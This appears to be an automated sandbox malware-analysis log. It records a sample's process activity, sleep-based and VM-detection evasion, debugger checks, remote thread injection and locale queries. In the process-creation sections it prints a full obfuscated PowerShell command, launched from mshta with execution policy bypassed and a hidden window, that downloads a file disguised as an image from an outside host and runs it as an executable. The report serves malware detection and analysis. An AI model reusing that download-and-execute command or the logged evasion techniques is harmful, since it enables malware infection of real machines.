Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1888	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3141	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 673	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1800	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1157	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908	Thread sleep count: 1800 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908	Thread sleep count: 1157 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2920	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404	Thread sleep time: -2760000s >= -30000s	Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404	Thread sleep time: -2700000s >= -30000s	Jump to behavior
Source: C:\Users\Public\snd32sys.exe TID: 4404	Thread sleep time: -60000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\Public\snd32sys.exe	Last function: Thread delayed
Source: C:\Users\Public\snd32sys.exe	Last function: Thread delayed

Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose,		16_2_0065838E
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00657FD2 FindFirstFileExW,		16_2_00657FD2

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_006133E0 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

16_2_006133E0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.334365492.0000000004E33000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp	Binary or memory string: j:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: mshta.exe, 00000001.00000003.224307613.0000000002FDB000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00657943 IsDebuggerPresent,

16_2_00657943

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,

16_2_00613560

Contains functionality to read the PEB

Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0064C285 mov eax, dword ptr fs:[00000030h]	16_2_0064C285
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659D43 mov eax, dword ptr fs:[00000030h]	16_2_00659D43
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659DC9 mov eax, dword ptr fs:[00000030h]	16_2_00659DC9
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659D86 mov eax, dword ptr fs:[00000030h]	16_2_00659D86
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659E24 mov eax, dword ptr fs:[00000030h]	16_2_00659E24
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659ED9 mov eax, dword ptr fs:[00000030h]	16_2_00659ED9
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659F61 mov eax, dword ptr fs:[00000030h]	16_2_00659F61
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659F1D mov eax, dword ptr fs:[00000030h]	16_2_00659F1D
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00659F92 mov eax, dword ptr fs:[00000030h]	16_2_00659F92
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h]	16_2_006B17C3
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h]	16_2_006B17C3
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_006B138F push dword ptr fs:[00000030h]	16_2_006B138F

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00611390 GetProcessHeap,RtlAllocateHeap,

16_2_00611390

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062BAF2 SetUnhandledExceptionFilter,	16_2_0062BAF2
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062B4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_0062B4CC
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062B95F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0062B95F
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00636D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00636D21

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject threads in other processes

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00613860 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,

16_2_00613860

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'			Jump to behavior

Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_0062BBFB cpuid

16_2_0062BBFB

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\Public\snd32sys.exe	Code function: EnumSystemLocalesW,	16_2_0065C067
Source: C:\Users\Public\snd32sys.exe	Code function: EnumSystemLocalesW,	16_2_0065C0D0
Source: C:\Users\Public\snd32sys.exe	Code function: EnumSystemLocalesW,	16_2_0065C16B
Source: C:\Users\Public\snd32sys.exe	Code function: ___crtGetLocaleInfoEx,	16_2_0062A104
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	16_2_0065C1F6
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,	16_2_0065C449
Source: C:\Users\Public\snd32sys.exe	Code function: EnumSystemLocalesW,	16_2_00651499
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	16_2_0065C56F
Source: C:\Users\Public\snd32sys.exe	Code function: EnumSystemLocalesW,	16_2_00651599
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,	16_2_0065C675
Source: C:\Users\Public\snd32sys.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	16_2_0065C744
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,	16_2_0062A79B
Source: C:\Users\Public\snd32sys.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	16_2_0065BDC5
Source: C:\Users\Public\snd32sys.exe	Code function: GetLocaleInfoW,	16_2_00651EBC

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
